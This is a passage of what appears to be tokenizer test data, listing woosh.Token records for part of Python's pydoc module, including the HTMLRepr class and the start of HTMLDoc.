woosh.Token(woosh.NAME, 'basedir', 504, 47, 504, 54),
woosh.Token(woosh.OP, ',', 504, 54, 504, 55),
woosh.Token(woosh.STRING, "'site-packages'", 504, 56, 504, 71),
woosh.Token(woosh.OP, ')', 504, 71, 504, 72),
woosh.Token(woosh.OP, ')', 504, 72, 504, 73),
woosh.Token(woosh.OP, ')', 504, 73, 504, 74),
woosh.Token(woosh.OP, ')', 504, 74, 504, 75),
woosh.Token(woosh.NAME, 'and', 504, 76, 504, 79),
woosh.Token(woosh.NAME, 'object', 505, 12, 505, 18),
woosh.Token(woosh.OP, '.', 505, 18, 505, 19),
woosh.Token(woosh.NAME, '__name__', 505, 19, 505, 27),
woosh.Token(woosh.NAME, 'not', 505, 28, 505, 31),
woosh.Token(woosh.NAME, 'in', 505, 32, 505, 34),
woosh.Token(woosh.OP, '(', 505, 35, 505, 36),
woosh.Token(woosh.STRING, "'xml.etree'", 505, 36, 505, 47),
woosh.Token(woosh.OP, ',', 505, 47, 505, 48),
woosh.Token(woosh.STRING, "'test.pydoc_mod'", 505, 49, 505, 65),
woosh.Token(woosh.OP, ')', 505, 65, 505, 66),
woosh.Token(woosh.OP, ')', 505, 66, 505, 67),
woosh.Token(woosh.OP, ':', 505, 67, 505, 68),
woosh.Token(woosh.NEWLINE, '\r\n', 505, 68, 506, 0),
woosh.Token(woosh.INDENT, ' ', 506, 0, 506, 12),
woosh.Token(woosh.NAME, 'if', 506, 12, 506, 14),
woosh.Token(woosh.NAME, 'docloc', 506, 15, 506, 21),
woosh.Token(woosh.OP, '.', 506, 21, 506, 22),
woosh.Token(woosh.NAME, 'startswith', 506, 22, 506, 32),
woosh.Token(woosh.OP, '(', 506, 32, 506, 33),
woosh.Token(woosh.OP, '(', 506, 33, 506, 34),
woosh.Token(woosh.STRING, '"http://"', 506, 34, 506, 43),
woosh.Token(woosh.OP, ',', 506, 43, 506, 44),
woosh.Token(woosh.STRING, '"https://"', 506, 45, 506, 55),
woosh.Token(woosh.OP, ')', 506, 55, 506, 56),
woosh.Token(woosh.OP, ')', 506, 56, 506, 57),
woosh.Token(woosh.OP, ':', 506, 57, 506, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 506, 58, 507, 0),
woosh.Token(woosh.INDENT, ' ', 507, 0, 507, 16),
woosh.Token(woosh.NAME, 'docloc', 507, 16, 507, 22),
woosh.Token(woosh.OP, '=', 507, 23, 507, 24),
woosh.Token(woosh.STRING, '"%s/%s"', 507, 25, 507, 32),
woosh.Token(woosh.OP, '%', 507, 33, 507, 34),
woosh.Token(woosh.OP, '(', 507, 35, 507, 36),
woosh.Token(woosh.NAME, 'docloc', 507, 36, 507, 42),
woosh.Token(woosh.OP, '.', 507, 42, 507, 43),
woosh.Token(woosh.NAME, 'rstrip', 507, 43, 507, 49),
woosh.Token(woosh.OP, '(', 507, 49, 507, 50),
woosh.Token(woosh.STRING, '"/"', 507, 50, 507, 53),
woosh.Token(woosh.OP, ')', 507, 53, 507, 54),
woosh.Token(woosh.OP, ',', 507, 54, 507, 55),
woosh.Token(woosh.NAME, 'object', 507, 56, 507, 62),
woosh.Token(woosh.OP, '.', 507, 62, 507, 63),
woosh.Token(woosh.NAME, '__name__', 507, 63, 507, 71),
woosh.Token(woosh.OP, '.', 507, 71, 507, 72),
woosh.Token(woosh.NAME, 'lower', 507, 72, 507, 77),
woosh.Token(woosh.OP, '(', 507, 77, 507, 78),
woosh.Token(woosh.OP, ')', 507, 78, 507, 79),
woosh.Token(woosh.OP, ')', 507, 79, 507, 80),
woosh.Token(woosh.NEWLINE, '\r\n', 507, 80, 508, 0),
woosh.Token(woosh.DEDENT, ' ', 508, 0, 508, 12),
woosh.Token(woosh.NAME, 'else', 508, 12, 508, 16),
woosh.Token(woosh.OP, ':', 508, 16, 508, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 508, 17, 509, 0),
woosh.Token(woosh.INDENT, ' ', 509, 0, 509, 16),
woosh.Token(woosh.NAME, 'docloc', 509, 16, 509, 22),
woosh.Token(woosh.OP, '=', 509, 23, 509, 24),
woosh.Token(woosh.NAME, 'os', 509, 25, 509, 27),
woosh.Token(woosh.OP, '.', 509, 27, 509, 28),
woosh.Token(woosh.NAME, 'path', 509, 28, 509, 32),
woosh.Token(woosh.OP, '.', 509, 32, 509, 33),
woosh.Token(woosh.NAME, 'join', 509, 33, 509, 37),
woosh.Token(woosh.OP, '(', 509, 37, 509, 38),
woosh.Token(woosh.NAME, 'docloc', 509, 38, 509, 44),
woosh.Token(woosh.OP, ',', 509, 44, 509, 45),
woosh.Token(woosh.NAME, 'object', 509, 46, 509, 52),
woosh.Token(woosh.OP, '.', 509, 52, 509, 53),
woosh.Token(woosh.NAME, '__name__', 509, 53, 509, 61),
woosh.Token(woosh.OP, '.', 509, 61, 509, 62),
woosh.Token(woosh.NAME, 'lower', 509, 62, 509, 67),
woosh.Token(woosh.OP, '(', 509, 67, 509, 68),
woosh.Token(woosh.OP, ')', 509, 68, 509, 69),
woosh.Token(woosh.OP, '+', 509, 70, 509, 71),
woosh.Token(woosh.STRING, '".html"', 509, 72, 509, 79),
woosh.Token(woosh.OP, ')', 509, 79, 509, 80),
woosh.Token(woosh.NEWLINE, '\r\n', 509, 80, 510, 0),
woosh.Token(woosh.DEDENT, ' ', 510, 0, 510, 8),
woosh.Token(woosh.DEDENT, '', 510, 8, 510, 8),
woosh.Token(woosh.NAME, 'else', 510, 8, 510, 12),
woosh.Token(woosh.OP, ':', 510, 12, 510, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 510, 13, 511, 0),
woosh.Token(woosh.INDENT, ' ', 511, 0, 511, 12),
woosh.Token(woosh.NAME, 'docloc', 511, 12, 511, 18),
woosh.Token(woosh.OP, '=', 511, 19, 511, 20),
woosh.Token(woosh.NAME, 'None', 511, 21, 511, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 511, 25, 512, 0),
woosh.Token(woosh.DEDENT, ' ', 512, 0, 512, 8),
woosh.Token(woosh.NAME, 'return', 512, 8, 512, 14),
woosh.Token(woosh.NAME, 'docloc', 512, 15, 512, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 512, 21, 513, 0),
woosh.Token(woosh.COMMENT, '# -------------------------------------------- HTML documentation generator', 514, 0, 514, 75),
woosh.Token(woosh.DEDENT, '', 516, 0, 516, 0),
woosh.Token(woosh.DEDENT, '', 516, 0, 516, 0),
woosh.Token(woosh.NAME, 'class', 516, 0, 516, 5),
woosh.Token(woosh.NAME, 'HTMLRepr', 516, 6, 516, 14),
woosh.Token(woosh.OP, '(', 516, 14, 516, 15),
woosh.Token(woosh.NAME, 'Repr', 516, 15, 516, 19),
woosh.Token(woosh.OP, ')', 516, 19, 516, 20),
woosh.Token(woosh.OP, ':', 516, 20, 516, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 516, 21, 517, 0),
woosh.Token(woosh.INDENT, ' ', 517, 0, 517, 4),
woosh.Token(woosh.STRING, '"""Class for safely making an HTML representation of a Python object."""', 517, 4, 517, 76),
woosh.Token(woosh.NEWLINE, '\r\n', 517, 76, 518, 0),
woosh.Token(woosh.NAME, 'def', 518, 4, 518, 7),
woosh.Token(woosh.NAME, '__init__', 518, 8, 518, 16),
woosh.Token(woosh.OP, '(', 518, 16, 518, 17),
woosh.Token(woosh.NAME, 'self', 518, 17, 518, 21),
woosh.Token(woosh.OP, ')', 518, 21, 518, 22),
woosh.Token(woosh.OP, ':', 518, 22, 518, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 518, 23, 519, 0),
woosh.Token(woosh.INDENT, ' ', 519, 0, 519, 8),
woosh.Token(woosh.NAME, 'Repr', 519, 8, 519, 12),
woosh.Token(woosh.OP, '.', 519, 12, 519, 13),
woosh.Token(woosh.NAME, '__init__', 519, 13, 519, 21),
woosh.Token(woosh.OP, '(', 519, 21, 519, 22),
woosh.Token(woosh.NAME, 'self', 519, 22, 519, 26),
woosh.Token(woosh.OP, ')', 519, 26, 519, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 519, 27, 520, 0),
woosh.Token(woosh.NAME, 'self', 520, 8, 520, 12),
woosh.Token(woosh.OP, '.', 520, 12, 520, 13),
woosh.Token(woosh.NAME, 'maxlist', 520, 13, 520, 20),
woosh.Token(woosh.OP, '=', 520, 21, 520, 22),
woosh.Token(woosh.NAME, 'self', 520, 23, 520, 27),
woosh.Token(woosh.OP, '.', 520, 27, 520, 28),
woosh.Token(woosh.NAME, 'maxtuple', 520, 28, 520, 36),
woosh.Token(woosh.OP, '=', 520, 37, 520, 38),
woosh.Token(woosh.NUMBER, '20', 520, 39, 520, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 520, 41, 521, 0),
woosh.Token(woosh.NAME, 'self', 521, 8, 521, 12),
woosh.Token(woosh.OP, '.', 521, 12, 521, 13),
woosh.Token(woosh.NAME, 'maxdict', 521, 13, 521, 20),
woosh.Token(woosh.OP, '=', 521, 21, 521, 22),
woosh.Token(woosh.NUMBER, '10', 521, 23, 521, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 521, 25, 522, 0),
woosh.Token(woosh.NAME, 'self', 522, 8, 522, 12),
woosh.Token(woosh.OP, '.', 522, 12, 522, 13),
woosh.Token(woosh.NAME, 'maxstring', 522, 13, 522, 22),
woosh.Token(woosh.OP, '=', 522, 23, 522, 24),
woosh.Token(woosh.NAME, 'self', 522, 25, 522, 29),
woosh.Token(woosh.OP, '.', 522, 29, 522, 30),
woosh.Token(woosh.NAME, 'maxother', 522, 30, 522, 38),
woosh.Token(woosh.OP, '=', 522, 39, 522, 40),
woosh.Token(woosh.NUMBER, '100', 522, 41, 522, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 522, 44, 523, 0),
woosh.Token(woosh.DEDENT, ' ', 524, 0, 524, 4),
woosh.Token(woosh.NAME, 'def', 524, 4, 524, 7),
woosh.Token(woosh.NAME, 'escape', 524, 8, 524, 14),
woosh.Token(woosh.OP, '(', 524, 14, 524, 15),
woosh.Token(woosh.NAME, 'self', 524, 15, 524, 19),
woosh.Token(woosh.OP, ',', 524, 19, 524, 20),
woosh.Token(woosh.NAME, 'text', 524, 21, 524, 25),
woosh.Token(woosh.OP, ')', 524, 25, 524, 26),
woosh.Token(woosh.OP, ':', 524, 26, 524, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 524, 27, 525, 0),
woosh.Token(woosh.INDENT, ' ', 525, 0, 525, 8),
woosh.Token(woosh.NAME, 'return', 525, 8, 525, 14),
woosh.Token(woosh.NAME, 'replace', 525, 15, 525, 22),
woosh.Token(woosh.OP, '(', 525, 22, 525, 23),
woosh.Token(woosh.NAME, 'text', 525, 23, 525, 27),
woosh.Token(woosh.OP, ',', 525, 27, 525, 28),
woosh.Token(woosh.STRING, "'&'", 525, 29, 525, 32),
woosh.Token(woosh.OP, ',', 525, 32, 525, 33),
woosh.Token(woosh.STRING, "'&'", 525, 34, 525, 41),
woosh.Token(woosh.OP, ',', 525, 41, 525, 42),
woosh.Token(woosh.STRING, "'<'", 525, 43, 525, 46),
woosh.Token(woosh.OP, ',', 525, 46, 525, 47),
woosh.Token(woosh.STRING, "'<'", 525, 48, 525, 54),
woosh.Token(woosh.OP, ',', 525, 54, 525, 55),
woosh.Token(woosh.STRING, "'>'", 525, 56, 525, 59),
woosh.Token(woosh.OP, ',', 525, 59, 525, 60),
woosh.Token(woosh.STRING, "'>'", 525, 61, 525, 67),
woosh.Token(woosh.OP, ')', 525, 67, 525, 68),
woosh.Token(woosh.NEWLINE, '\r\n', 525, 68, 526, 0),
woosh.Token(woosh.DEDENT, ' ', 527, 0, 527, 4),
woosh.Token(woosh.NAME, 'def', 527, 4, 527, 7),
woosh.Token(woosh.NAME, 'repr', 527, 8, 527, 12),
woosh.Token(woosh.OP, '(', 527, 12, 527, 13),
woosh.Token(woosh.NAME, 'self', 527, 13, 527, 17),
woosh.Token(woosh.OP, ',', 527, 17, 527, 18),
woosh.Token(woosh.NAME, 'object', 527, 19, 527, 25),
woosh.Token(woosh.OP, ')', 527, 25, 527, 26),
woosh.Token(woosh.OP, ':', 527, 26, 527, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 527, 27, 528, 0),
woosh.Token(woosh.INDENT, ' ', 528, 0, 528, 8),
woosh.Token(woosh.NAME, 'return', 528, 8, 528, 14),
woosh.Token(woosh.NAME, 'Repr', 528, 15, 528, 19),
woosh.Token(woosh.OP, '.', 528, 19, 528, 20),
woosh.Token(woosh.NAME, 'repr', 528, 20, 528, 24),
woosh.Token(woosh.OP, '(', 528, 24, 528, 25),
woosh.Token(woosh.NAME, 'self', 528, 25, 528, 29),
woosh.Token(woosh.OP, ',', 528, 29, 528, 30),
woosh.Token(woosh.NAME, 'object', 528, 31, 528, 37),
woosh.Token(woosh.OP, ')', 528, 37, 528, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 528, 38, 529, 0),
woosh.Token(woosh.DEDENT, ' ', 530, 0, 530, 4),
woosh.Token(woosh.NAME, 'def', 530, 4, 530, 7),
woosh.Token(woosh.NAME, 'repr1', 530, 8, 530, 13),
woosh.Token(woosh.OP, '(', 530, 13, 530, 14),
woosh.Token(woosh.NAME, 'self', 530, 14, 530, 18),
woosh.Token(woosh.OP, ',', 530, 18, 530, 19),
woosh.Token(woosh.NAME, 'x', 530, 20, 530, 21),
woosh.Token(woosh.OP, ',', 530, 21, 530, 22),
woosh.Token(woosh.NAME, 'level', 530, 23, 530, 28),
woosh.Token(woosh.OP, ')', 530, 28, 530, 29),
woosh.Token(woosh.OP, ':', 530, 29, 530, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 530, 30, 531, 0),
woosh.Token(woosh.INDENT, ' ', 531, 0, 531, 8),
woosh.Token(woosh.NAME, 'if', 531, 8, 531, 10),
woosh.Token(woosh.NAME, 'hasattr', 531, 11, 531, 18),
woosh.Token(woosh.OP, '(', 531, 18, 531, 19),
woosh.Token(woosh.NAME, 'type', 531, 19, 531, 23),
woosh.Token(woosh.OP, '(', 531, 23, 531, 24),
woosh.Token(woosh.NAME, 'x', 531, 24, 531, 25),
woosh.Token(woosh.OP, ')', 531, 25, 531, 26),
woosh.Token(woosh.OP, ',', 531, 26, 531, 27),
woosh.Token(woosh.STRING, "'__name__'", 531, 28, 531, 38),
woosh.Token(woosh.OP, ')', 531, 38, 531, 39),
woosh.Token(woosh.OP, ':', 531, 39, 531, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 531, 40, 532, 0),
woosh.Token(woosh.INDENT, ' ', 532, 0, 532, 12),
woosh.Token(woosh.NAME, 'methodname', 532, 12, 532, 22),
woosh.Token(woosh.OP, '=', 532, 23, 532, 24),
woosh.Token(woosh.STRING, "'repr_'", 532, 25, 532, 32),
woosh.Token(woosh.OP, '+', 532, 33, 532, 34),
woosh.Token(woosh.STRING, "'_'", 532, 35, 532, 38),
woosh.Token(woosh.OP, '.', 532, 38, 532, 39),
woosh.Token(woosh.NAME, 'join', 532, 39, 532, 43),
woosh.Token(woosh.OP, '(', 532, 43, 532, 44),
woosh.Token(woosh.NAME, 'type', 532, 44, 532, 48),
woosh.Token(woosh.OP, '(', 532, 48, 532, 49),
woosh.Token(woosh.NAME, 'x', 532, 49, 532, 50),
woosh.Token(woosh.OP, ')', 532, 50, 532, 51),
woosh.Token(woosh.OP, '.', 532, 51, 532, 52),
woosh.Token(woosh.NAME, '__name__', 532, 52, 532, 60),
woosh.Token(woosh.OP, '.', 532, 60, 532, 61),
woosh.Token(woosh.NAME, 'split', 532, 61, 532, 66),
woosh.Token(woosh.OP, '(', 532, 66, 532, 67),
woosh.Token(woosh.OP, ')', 532, 67, 532, 68),
woosh.Token(woosh.OP, ')', 532, 68, 532, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 532, 69, 533, 0),
woosh.Token(woosh.NAME, 'if', 533, 12, 533, 14),
woosh.Token(woosh.NAME, 'hasattr', 533, 15, 533, 22),
woosh.Token(woosh.OP, '(', 533, 22, 533, 23),
woosh.Token(woosh.NAME, 'self', 533, 23, 533, 27),
woosh.Token(woosh.OP, ',', 533, 27, 533, 28),
woosh.Token(woosh.NAME, 'methodname', 533, 29, 533, 39),
woosh.Token(woosh.OP, ')', 533, 39, 533, 40),
woosh.Token(woosh.OP, ':', 533, 40, 533, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 533, 41, 534, 0),
woosh.Token(woosh.INDENT, ' ', 534, 0, 534, 16),
woosh.Token(woosh.NAME, 'return', 534, 16, 534, 22),
woosh.Token(woosh.NAME, 'getattr', 534, 23, 534, 30),
woosh.Token(woosh.OP, '(', 534, 30, 534, 31),
woosh.Token(woosh.NAME, 'self', 534, 31, 534, 35),
woosh.Token(woosh.OP, ',', 534, 35, 534, 36),
woosh.Token(woosh.NAME, 'methodname', 534, 37, 534, 47),
woosh.Token(woosh.OP, ')', 534, 47, 534, 48),
woosh.Token(woosh.OP, '(', 534, 48, 534, 49),
woosh.Token(woosh.NAME, 'x', 534, 49, 534, 50),
woosh.Token(woosh.OP, ',', 534, 50, 534, 51),
woosh.Token(woosh.NAME, 'level', 534, 52, 534, 57),
woosh.Token(woosh.OP, ')', 534, 57, 534, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 534, 58, 535, 0),
woosh.Token(woosh.DEDENT, ' ', 535, 0, 535, 8),
woosh.Token(woosh.DEDENT, '', 535, 8, 535, 8),
woosh.Token(woosh.NAME, 'return', 535, 8, 535, 14),
woosh.Token(woosh.NAME, 'self', 535, 15, 535, 19),
woosh.Token(woosh.OP, '.', 535, 19, 535, 20),
woosh.Token(woosh.NAME, 'escape', 535, 20, 535, 26),
woosh.Token(woosh.OP, '(', 535, 26, 535, 27),
woosh.Token(woosh.NAME, 'cram', 535, 27, 535, 31),
woosh.Token(woosh.OP, '(', 535, 31, 535, 32),
woosh.Token(woosh.NAME, 'stripid', 535, 32, 535, 39),
woosh.Token(woosh.OP, '(', 535, 39, 535, 40),
woosh.Token(woosh.NAME, 'repr', 535, 40, 535, 44),
woosh.Token(woosh.OP, '(', 535, 44, 535, 45),
woosh.Token(woosh.NAME, 'x', 535, 45, 535, 46),
woosh.Token(woosh.OP, ')', 535, 46, 535, 47),
woosh.Token(woosh.OP, ')', 535, 47, 535, 48),
woosh.Token(woosh.OP, ',', 535, 48, 535, 49),
woosh.Token(woosh.NAME, 'self', 535, 50, 535, 54),
woosh.Token(woosh.OP, '.', 535, 54, 535, 55),
woosh.Token(woosh.NAME, 'maxother', 535, 55, 535, 63),
woosh.Token(woosh.OP, ')', 535, 63, 535, 64),
woosh.Token(woosh.OP, ')', 535, 64, 535, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 535, 65, 536, 0),
woosh.Token(woosh.DEDENT, ' ', 537, 0, 537, 4),
woosh.Token(woosh.NAME, 'def', 537, 4, 537, 7),
woosh.Token(woosh.NAME, 'repr_string', 537, 8, 537, 19),
woosh.Token(woosh.OP, '(', 537, 19, 537, 20),
woosh.Token(woosh.NAME, 'self', 537, 20, 537, 24),
woosh.Token(woosh.OP, ',', 537, 24, 537, 25),
woosh.Token(woosh.NAME, 'x', 537, 26, 537, 27),
woosh.Token(woosh.OP, ',', 537, 27, 537, 28),
woosh.Token(woosh.NAME, 'level', 537, 29, 537, 34),
woosh.Token(woosh.OP, ')', 537, 34, 537, 35),
woosh.Token(woosh.OP, ':', 537, 35, 537, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 537, 36, 538, 0),
woosh.Token(woosh.INDENT, ' ', 538, 0, 538, 8),
woosh.Token(woosh.NAME, 'test', 538, 8, 538, 12),
woosh.Token(woosh.OP, '=', 538, 13, 538, 14),
woosh.Token(woosh.NAME, 'cram', 538, 15, 538, 19),
woosh.Token(woosh.OP, '(', 538, 19, 538, 20),
woosh.Token(woosh.NAME, 'x', 538, 20, 538, 21),
woosh.Token(woosh.OP, ',', 538, 21, 538, 22),
woosh.Token(woosh.NAME, 'self', 538, 23, 538, 27),
woosh.Token(woosh.OP, '.', 538, 27, 538, 28),
woosh.Token(woosh.NAME, 'maxstring', 538, 28, 538, 37),
woosh.Token(woosh.OP, ')', 538, 37, 538, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 538, 38, 539, 0),
woosh.Token(woosh.NAME, 'testrepr', 539, 8, 539, 16),
woosh.Token(woosh.OP, '=', 539, 17, 539, 18),
woosh.Token(woosh.NAME, 'repr', 539, 19, 539, 23),
woosh.Token(woosh.OP, '(', 539, 23, 539, 24),
woosh.Token(woosh.NAME, 'test', 539, 24, 539, 28),
woosh.Token(woosh.OP, ')', 539, 28, 539, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 539, 29, 540, 0),
woosh.Token(woosh.NAME, 'if', 540, 8, 540, 10),
woosh.Token(woosh.STRING, "'\\\\'", 540, 11, 540, 15),
woosh.Token(woosh.NAME, 'in', 540, 16, 540, 18),
woosh.Token(woosh.NAME, 'test', 540, 19, 540, 23),
woosh.Token(woosh.NAME, 'and', 540, 24, 540, 27),
woosh.Token(woosh.STRING, "'\\\\'", 540, 28, 540, 32),
woosh.Token(woosh.NAME, 'not', 540, 33, 540, 36),
woosh.Token(woosh.NAME, 'in', 540, 37, 540, 39),
woosh.Token(woosh.NAME, 'replace', 540, 40, 540, 47),
woosh.Token(woosh.OP, '(', 540, 47, 540, 48),
woosh.Token(woosh.NAME, 'testrepr', 540, 48, 540, 56),
woosh.Token(woosh.OP, ',', 540, 56, 540, 57),
woosh.Token(woosh.STRING, "r'\\\\'", 540, 58, 540, 63),
woosh.Token(woosh.OP, ',', 540, 63, 540, 64),
woosh.Token(woosh.STRING, "''", 540, 65, 540, 67),
woosh.Token(woosh.OP, ')', 540, 67, 540, 68),
woosh.Token(woosh.OP, ':', 540, 68, 540, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 540, 69, 541, 0),
woosh.Token(woosh.COMMENT, '# Backslashes are only literal in the string and are never', 541, 12, 541, 70),
woosh.Token(woosh.COMMENT, '# needed to make any special characters, so show a raw string.', 542, 12, 542, 74),
woosh.Token(woosh.INDENT, ' ', 543, 0, 543, 12),
woosh.Token(woosh.NAME, 'return', 543, 12, 543, 18),
woosh.Token(woosh.STRING, "'r'", 543, 19, 543, 22),
woosh.Token(woosh.OP, '+', 543, 23, 543, 24),
woosh.Token(woosh.NAME, 'testrepr', 543, 25, 543, 33),
woosh.Token(woosh.OP, '[', 543, 33, 543, 34),
woosh.Token(woosh.NUMBER, '0', 543, 34, 543, 35),
woosh.Token(woosh.OP, ']', 543, 35, 543, 36),
woosh.Token(woosh.OP, '+', 543, 37, 543, 38),
woosh.Token(woosh.NAME, 'self', 543, 39, 543, 43),
woosh.Token(woosh.OP, '.', 543, 43, 543, 44),
woosh.Token(woosh.NAME, 'escape', 543, 44, 543, 50),
woosh.Token(woosh.OP, '(', 543, 50, 543, 51),
woosh.Token(woosh.NAME, 'test', 543, 51, 543, 55),
woosh.Token(woosh.OP, ')', 543, 55, 543, 56),
woosh.Token(woosh.OP, '+', 543, 57, 543, 58),
woosh.Token(woosh.NAME, 'testrepr', 543, 59, 543, 67),
woosh.Token(woosh.OP, '[', 543, 67, 543, 68),
woosh.Token(woosh.NUMBER, '0', 543, 68, 543, 69),
woosh.Token(woosh.OP, ']', 543, 69, 543, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 543, 70, 544, 0),
woosh.Token(woosh.DEDENT, ' ', 544, 0, 544, 8),
woosh.Token(woosh.NAME, 'return', 544, 8, 544, 14),
woosh.Token(woosh.NAME, 're', 544, 15, 544, 17),
woosh.Token(woosh.OP, '.', 544, 17, 544, 18),
woosh.Token(woosh.NAME, 'sub', 544, 18, 544, 21),
woosh.Token(woosh.OP, '(', 544, 21, 544, 22),
woosh.Token(woosh.STRING, 'r\'((\\\\[\\\\abfnrtv\\\'"]|\\\\[0-9]..|\\\\x..|\\\\u....)+)\'', 544, 22, 544, 70),
woosh.Token(woosh.OP, ',', 544, 70, 544, 71),
woosh.Token(woosh.STRING, 'r\'<font color="#c040c0">\\1</font>\'', 545, 22, 545, 56),
woosh.Token(woosh.OP, ',', 545, 56, 545, 57),
woosh.Token(woosh.NAME, 'self', 546, 22, 546, 26),
woosh.Token(woosh.OP, '.', 546, 26, 546, 27),
woosh.Token(woosh.NAME, 'escape', 546, 27, 546, 33),
woosh.Token(woosh.OP, '(', 546, 33, 546, 34),
woosh.Token(woosh.NAME, 'testrepr', 546, 34, 546, 42),
woosh.Token(woosh.OP, ')', 546, 42, 546, 43),
woosh.Token(woosh.OP, ')', 546, 43, 546, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 546, 44, 547, 0),
woosh.Token(woosh.DEDENT, ' ', 548, 0, 548, 4),
woosh.Token(woosh.NAME, 'repr_str', 548, 4, 548, 12),
woosh.Token(woosh.OP, '=', 548, 13, 548, 14),
woosh.Token(woosh.NAME, 'repr_string', 548, 15, 548, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 548, 26, 549, 0),
woosh.Token(woosh.NAME, 'def', 550, 4, 550, 7),
woosh.Token(woosh.NAME, 'repr_instance', 550, 8, 550, 21),
woosh.Token(woosh.OP, '(', 550, 21, 550, 22),
woosh.Token(woosh.NAME, 'self', 550, 22, 550, 26),
woosh.Token(woosh.OP, ',', 550, 26, 550, 27),
woosh.Token(woosh.NAME, 'x', 550, 28, 550, 29),
woosh.Token(woosh.OP, ',', 550, 29, 550, 30),
woosh.Token(woosh.NAME, 'level', 550, 31, 550, 36),
woosh.Token(woosh.OP, ')', 550, 36, 550, 37),
woosh.Token(woosh.OP, ':', 550, 37, 550, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 550, 38, 551, 0),
woosh.Token(woosh.INDENT, ' ', 551, 0, 551, 8),
woosh.Token(woosh.NAME, 'try', 551, 8, 551, 11),
woosh.Token(woosh.OP, ':', 551, 11, 551, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 551, 12, 552, 0),
woosh.Token(woosh.INDENT, ' ', 552, 0, 552, 12),
woosh.Token(woosh.NAME, 'return', 552, 12, 552, 18),
woosh.Token(woosh.NAME, 'self', 552, 19, 552, 23),
woosh.Token(woosh.OP, '.', 552, 23, 552, 24),
woosh.Token(woosh.NAME, 'escape', 552, 24, 552, 30),
woosh.Token(woosh.OP, '(', 552, 30, 552, 31),
woosh.Token(woosh.NAME, 'cram', 552, 31, 552, 35),
woosh.Token(woosh.OP, '(', 552, 35, 552, 36),
woosh.Token(woosh.NAME, 'stripid', 552, 36, 552, 43),
woosh.Token(woosh.OP, '(', 552, 43, 552, 44),
woosh.Token(woosh.NAME, 'repr', 552, 44, 552, 48),
woosh.Token(woosh.OP, '(', 552, 48, 552, 49),
woosh.Token(woosh.NAME, 'x', 552, 49, 552, 50),
woosh.Token(woosh.OP, ')', 552, 50, 552, 51),
woosh.Token(woosh.OP, ')', 552, 51, 552, 52),
woosh.Token(woosh.OP, ',', 552, 52, 552, 53),
woosh.Token(woosh.NAME, 'self', 552, 54, 552, 58),
woosh.Token(woosh.OP, '.', 552, 58, 552, 59),
woosh.Token(woosh.NAME, 'maxstring', 552, 59, 552, 68),
woosh.Token(woosh.OP, ')', 552, 68, 552, 69),
woosh.Token(woosh.OP, ')', 552, 69, 552, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 552, 70, 553, 0),
woosh.Token(woosh.DEDENT, ' ', 553, 0, 553, 8),
woosh.Token(woosh.NAME, 'except', 553, 8, 553, 14),
woosh.Token(woosh.OP, ':', 553, 14, 553, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 553, 15, 554, 0),
woosh.Token(woosh.INDENT, ' ', 554, 0, 554, 12),
woosh.Token(woosh.NAME, 'return', 554, 12, 554, 18),
woosh.Token(woosh.NAME, 'self', 554, 19, 554, 23),
woosh.Token(woosh.OP, '.', 554, 23, 554, 24),
woosh.Token(woosh.NAME, 'escape', 554, 24, 554, 30),
woosh.Token(woosh.OP, '(', 554, 30, 554, 31),
woosh.Token(woosh.STRING, "'<%s instance>'", 554, 31, 554, 46),
woosh.Token(woosh.OP, '%', 554, 47, 554, 48),
woosh.Token(woosh.NAME, 'x', 554, 49, 554, 50),
woosh.Token(woosh.OP, '.', 554, 50, 554, 51),
woosh.Token(woosh.NAME, '__class__', 554, 51, 554, 60),
woosh.Token(woosh.OP, '.', 554, 60, 554, 61),
woosh.Token(woosh.NAME, '__name__', 554, 61, 554, 69),
woosh.Token(woosh.OP, ')', 554, 69, 554, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 554, 70, 555, 0),
woosh.Token(woosh.DEDENT, ' ', 556, 0, 556, 4),
woosh.Token(woosh.DEDENT, '', 556, 4, 556, 4),
woosh.Token(woosh.NAME, 'repr_unicode', 556, 4, 556, 16),
woosh.Token(woosh.OP, '=', 556, 17, 556, 18),
woosh.Token(woosh.NAME, 'repr_string', 556, 19, 556, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 556, 30, 557, 0),
woosh.Token(woosh.DEDENT, '', 558, 0, 558, 0),
woosh.Token(woosh.NAME, 'class', 558, 0, 558, 5),
woosh.Token(woosh.NAME, 'HTMLDoc', 558, 6, 558, 13),
woosh.Token(woosh.OP, '(', 558, 13, 558, 14),
woosh.Token(woosh.NAME, 'Doc', 558, 14, 558, 17),
woosh.Token(woosh.OP, ')', 558, 17, 558, 18),
woosh.Token(woosh.OP, ':', 558, 18, 558, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 558, 19, 559, 0),
woosh.Token(woosh.INDENT, ' ', 559, 0, 559, 4),
woosh.Token(woosh.STRING, '"""Formatter class for HTML documentation."""', 559, 4, 559, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 559, 49, 560, 0),
